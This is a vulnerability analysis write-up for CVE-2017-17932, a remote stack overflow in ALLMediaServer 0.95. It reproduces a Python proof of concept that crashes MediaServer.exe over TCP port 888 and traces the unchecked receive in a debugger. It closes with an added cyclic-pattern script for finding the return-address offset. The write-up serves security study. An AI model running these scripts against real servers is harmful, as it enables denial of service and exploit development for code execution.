[CVE-2017-17932] ALLMediaServer 0.95 Remote Overflow Vulnerability Analysis

0x00 References

  https://www.exploit-db.com/exploits/43406/

# Exploit Title: Buffer overflow in ALLPlayer ALLMediaServer 0.95 and earlier
# CVE: CVE-2017-17932
# Date: 27-12-2017
# Exploit Author: Aloyce J. Makalanga
# Vendor Homepage: http://www.allmediaserver.org/
# Category: webapps
# Attack Type: Remote
# Impact: Code execution and/or Denial of Service

#1. Description
#
#A buffer overflow vulnerability exists in MediaServer.exe in ALLPlayer ALLMediaServer 0.95 and earlier that could allow remote attackers to execute arbitrary code and/or cause denial of service on the victim machine/computer via a long string to TCP port 888. To exploit this vulnerability, an attacker must connect to the server with a long, malicious string.
#
#2. Proof of Concept
#

#!/usr/bin/python

#NOTE: I found this bug via patch-diffing and I had IDA Pro set up as my Just-In-Time debugger at the time of the crash but any debugger should work.

import socket


def main():
    # Connect to MediaServer.exe, which listens on TCP port 888
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('192.168.205.131', 888))

    # 3000 bytes of 'A' (0x41): far more than the server's stack buffer holds
    buffer = b"A" * 3000

    s.send(buffer)
    s.close()


if __name__ == '__main__':
    main()

Change 192.168.205.131 to the IP address of your own target.


0x01 Vulnerability Analysis

Reproduction environment: Windows 10, Python 2.7.0

Start ALLMediaServer, attach a debugger to MediaServer.exe, and use the PoC to send a TCP request to 127.0.0.1:888. This triggers the vulnerability and MediaServer.exe crashes.

At the crash, the current stack has been overwritten with 0x41 (the 'A' bytes of the PoC).

Use the buffer address at the crash site, buf = 0534F910 (this value changes between runs), to locate the code that triggers the vulnerability.

Send a first request.

At this point the contents of buf have not overflowed; the server has only initialized some data.

Set a hardware breakpoint on this address, then send a second request. The breakpoint now hits at a location inside the accept function.

Keep single-stepping until reaching the code that receives the data.

Step into it.

Here it can be seen that all of the received data is read into buf with no check against the buffer's size, which causes the overflow.
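The PoC above and the analysis that follows it only show that the stack is flooded with 0x41 bytes, which tells the debugger nothing about which position of the 3000-byte input lands in the overwritten return address. The script below is an added example, not code from the page or from the exploit author: it replaces "A" * 3000 with a Metasploit-style cyclic pattern whose every 4-byte window is unique, so the value read from EIP/ESP after the crash maps straight back to an offset in the payload. The target host/port default to 127.0.0.1:888 as in the reproduction above (assumed lab target), and the crash value 0x33614132 used in the usage branch is constructed for illustration, not a value observed on the page.

```python
import socket
import string
import struct


def cyclic_pattern(length):
    """Return `length` bytes of a non-repeating pattern suitable for offset discovery.

    Metasploit-style: triples of (uppercase, lowercase, digit), "Aa0Aa1...".
    Every 4-byte window is unique for lengths up to 26*26*10*3 = 20280 bytes.
    """
    if length > 20280:
        raise ValueError("pattern is only unique up to 20280 bytes")
    chunks = []
    total = 0
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                total += 3
                if total >= length:
                    return "".join(chunks)[:length].encode("ascii")
    return "".join(chunks)[:length].encode("ascii")


def dword_at(pattern, offset):
    """Little-endian 32-bit value at `offset`, as it would appear in EIP/ESP on x86."""
    return struct.unpack("<I", pattern[offset:offset + 4])[0]


def find_offset(pattern, value):
    """Map a register value (int) or raw 4 bytes back to its offset in the pattern, or -1."""
    needle = struct.pack("<I", value) if isinstance(value, int) else value
    return pattern.find(needle)


def all_windows_unique(pattern, width=4):
    """True if no `width`-byte window repeats, i.e. find_offset() is unambiguous."""
    count = len(pattern) - width + 1
    windows = {pattern[i:i + width] for i in range(count)}
    return len(windows) == count


def send_payload(payload, host="127.0.0.1", port=888):
    """Deliver `payload` to MediaServer.exe exactly as the PoC does: one send, then close."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.connect((host, port))
        s.sendall(payload)
    finally:
        s.close()


if __name__ == "__main__":
    pattern = cyclic_pattern(3000)
    # Step 1: crash the server with the pattern instead of "A" * 3000.
    # Assumed lab target; a refused connection just means no server is listening.
    try:
        send_payload(pattern)
    except socket.error as exc:
        print("send failed (no target listening?):", exc)
    # Step 2: read the overwritten register from the debugger and map it back.
    # 0x33614132 is a constructed example value, not one observed on the page.
    print("offset of 0x33614132:", find_offset(pattern, 0x33614132))
```

With "A" * 3000 the register reads 0x41414141 and find_offset() returns -1, because "AAAA" never occurs in the pattern; with the cyclic payload the same register value names the exact byte index to place a chosen address at.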
